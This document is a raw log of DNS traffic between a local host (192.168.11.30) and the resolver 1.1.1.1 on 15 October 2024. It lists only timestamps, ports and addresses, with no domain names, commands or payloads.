                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.646583080 CEST6196553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.907320023 CEST53619651.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.910707951 CEST5355953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.040931940 CEST53535591.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.045496941 CEST5007353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.208344936 CEST53500731.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.212366104 CEST5828153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.344176054 CEST53582811.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.347815037 CEST6541653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.439129114 CEST6109153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.529771090 CEST53654161.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.536597013 CEST5660853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.592607021 CEST53610911.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.699387074 CEST53566081.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.703058004 CEST6055453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.997534990 CEST53605541.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.001287937 CEST5247653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.133137941 CEST53524761.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.136564970 CEST5839253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.268093109 CEST53583921.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.271790028 CEST5315153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.404104948 CEST53531511.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.409508944 CEST5861053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.539346933 CEST53586101.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.543056011 CEST5211153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.674990892 CEST53521111.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.678983927 CEST5269553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.857009888 CEST53526951.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.860831976 CEST4915253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.992207050 CEST53491521.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.998054028 CEST6534553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:25.200723886 CEST53653451.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:25.204174042 CEST5338953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:25.694097996 CEST53533891.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.732544899 CEST6076253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.864736080 CEST53607621.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.868313074 CEST6067553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.000902891 CEST53606751.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.005860090 CEST5895453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.170281887 CEST53589541.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.176175117 CEST5350053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.309149981 CEST53535001.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.314455032 CEST5103953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.445425987 CEST53510391.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.449090958 CEST5643553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.530795097 CEST5325453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.580864906 CEST53564351.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.586075068 CEST6339853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.659954071 CEST53532541.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.749084949 CEST53633981.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.754332066 CEST5179953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.884202003 CEST53517991.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.888900995 CEST6262653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.052155972 CEST53626261.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.056337118 CEST6087553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.220949888 CEST53608751.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.226068974 CEST6501953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.421612024 CEST53650191.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.429393053 CEST6388653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.561008930 CEST53638861.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.565179110 CEST6041453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.694941998 CEST53604141.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.700186014 CEST6343553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.936291933 CEST53634351.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.939871073 CEST4978853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.068809032 CEST53497881.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.072240114 CEST6416553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.203437090 CEST53641651.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.207207918 CEST5949753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.338823080 CEST53594971.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.342436075 CEST5268553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.474129915 CEST53526851.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.479990005 CEST5557353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.770035028 CEST53555731.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.776096106 CEST5385653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.940285921 CEST53538561.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.945789099 CEST5597453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:32.077666998 CEST53559741.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:32.082159996 CEST5787153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:32.417399883 CEST53578711.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.508886099 CEST5483353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.712908983 CEST53548331.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.716840029 CEST4950653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.882102013 CEST53495061.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.885670900 CEST6385153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.016165972 CEST53638511.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.019810915 CEST5496953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.184149027 CEST53549691.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.188375950 CEST5534253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.320317030 CEST53553421.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.324055910 CEST6197753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.455329895 CEST53619771.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.459127903 CEST5596053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.675358057 CEST53559601.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.681737900 CEST6295053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.810920000 CEST53629501.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.814660072 CEST5158553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.919897079 CEST5109453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.026983976 CEST53515851.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.031027079 CEST6504353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.049221039 CEST53510941.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.194293976 CEST53650431.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.198709965 CEST6206953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.404366970 CEST53620691.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.410093069 CEST5831553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.545795918 CEST53583151.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.550668955 CEST5385853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.681818962 CEST53538581.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.687758923 CEST6155153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.895689964 CEST53615511.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.899818897 CEST6385953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.031255007 CEST53638591.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.035335064 CEST5798053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.168739080 CEST53579801.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.172792912 CEST5423553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.306154966 CEST53542351.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.310612917 CEST5823953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.473686934 CEST53582391.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.477615118 CEST5294253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.611176968 CEST53529421.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.616976976 CEST5322753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.820714951 CEST53532271.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.824876070 CEST5815453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.956223965 CEST53581541.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.998590946 CEST5263953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.130565882 CEST53526391.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.135379076 CEST5658153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.267520905 CEST53565811.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.271543026 CEST4939953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.405050039 CEST53493991.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.410033941 CEST5400053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.656404972 CEST53540001.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.668812037 CEST5297753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.804936886 CEST5908153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.831593037 CEST53529771.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.837740898 CEST5824753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.936119080 CEST53590811.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.968178988 CEST53582471.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.972775936 CEST6329753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.231833935 CEST53632971.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.236644030 CEST5937153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.399180889 CEST53593711.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.403394938 CEST5638453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.567142010 CEST53563841.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.571538925 CEST5467553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.701117992 CEST53546751.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.705096006 CEST6399353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.922002077 CEST53639931.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.926253080 CEST5526053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.089970112 CEST53552601.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.095637083 CEST5251653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.301032066 CEST53525161.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.305754900 CEST5196353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.435883045 CEST53519631.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.440424919 CEST4929653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.606043100 CEST5667753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.644104004 CEST53492961.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.649853945 CEST6156653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.737411976 CEST53566771.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.781250954 CEST53615661.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.785608053 CEST5036753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.918150902 CEST53503671.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.922159910 CEST5841353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.055444956 CEST53584131.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.060472012 CEST5728553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.191740990 CEST53572851.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.195957899 CEST5056153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.325480938 CEST53505611.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.330426931 CEST6109953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.535262108 CEST53610991.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.541280031 CEST6163053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.704972982 CEST53616301.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.711361885 CEST5459353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.744759083 CEST5589453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.922581911 CEST53545931.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.996750116 CEST53558941.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:48.947699070 CEST5457753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.079109907 CEST53545771.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.083225965 CEST6427653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.247307062 CEST53642761.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.251451969 CEST5351953192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.414371967 CEST53535191.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.418332100 CEST6452153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.600483894 CEST53645211.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.605550051 CEST5244153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.734067917 CEST53524411.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.739710093 CEST5467053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.945694923 CEST53546701.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.949956894 CEST6084053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.114571095 CEST53608401.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.118576050 CEST5738653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.247878075 CEST53573861.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.252131939 CEST6013353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.415230989 CEST53601331.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.420017958 CEST5259253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.582907915 CEST53525921.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.586915016 CEST6537853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.717269897 CEST53653781.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.721501112 CEST6157853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:51.017802954 CEST53615781.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:51.712886095 CEST5217653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:51.844352007 CEST53521761.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:51.847227097 CEST5893153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:51.979098082 CEST53589311.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:51.982026100 CEST5902153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.145538092 CEST53590211.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.148946047 CEST5259653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.354728937 CEST53525961.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.358076096 CEST6112153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.399060965 CEST6191553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.523325920 CEST53611211.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.526359081 CEST5108653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.529164076 CEST53619151.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.656572104 CEST53510861.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.659454107 CEST5215453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.792020082 CEST53521541.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.795188904 CEST5009853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.927196026 CEST53500981.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.930325031 CEST5409553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.095614910 CEST53540951.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.098484039 CEST5490553192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.387314081 CEST53549051.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.390530109 CEST6011353192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.520831108 CEST53601131.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.524136066 CEST5043753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.747910976 CEST53504371.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.750977039 CEST6362053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.041420937 CEST53636201.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.044800997 CEST6214653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.278383017 CEST53621461.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.281815052 CEST5544753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.586980104 CEST53554471.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.589972973 CEST5869153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.719954014 CEST53586911.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.722759008 CEST6236753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.835540056 CEST6522653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.854980946 CEST53623671.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.857971907 CEST5003753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.965719938 CEST53652261.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.021820068 CEST53500371.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.025285959 CEST5928753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.232455969 CEST53592871.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.235795975 CEST5333753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.533637047 CEST53533371.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.537533998 CEST5596053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.717464924 CEST53559601.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.721199036 CEST6216053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.853084087 CEST53621601.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.856214046 CEST5877053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.987535954 CEST53587701.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.990683079 CEST5242853192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.122447968 CEST53524281.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.125519037 CEST5460153192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.288511992 CEST53546011.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.291580915 CEST6269253192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.454893112 CEST53626921.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.457935095 CEST6247053192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.688235044 CEST53624701.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.691026926 CEST5050653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.822460890 CEST53505061.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.825618982 CEST5806753192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.008601904 CEST53580671.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.011589050 CEST5410453192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.173768044 CEST53541041.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.176898003 CEST5662653192.168.11.301.1.1.1
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.385817051 CEST53566261.1.1.1192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.388931036 CEST4947753192.168.11.301.1.1.1
